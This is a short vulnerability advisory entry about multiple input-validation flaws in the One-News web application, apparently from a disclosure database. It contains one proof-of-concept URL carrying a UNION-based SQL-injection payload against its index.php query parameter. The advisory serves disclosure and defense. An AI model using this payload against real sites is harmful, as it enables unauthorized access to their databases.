• info
• discussion
• exploit
• solution
• references

One-News Multiple Input Validation Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept content URI is available to exploit the SQL-injection issue:

http://www.example.com/onenews_beta2/index.php?q=3' and 1=2 union select 1,2,3/*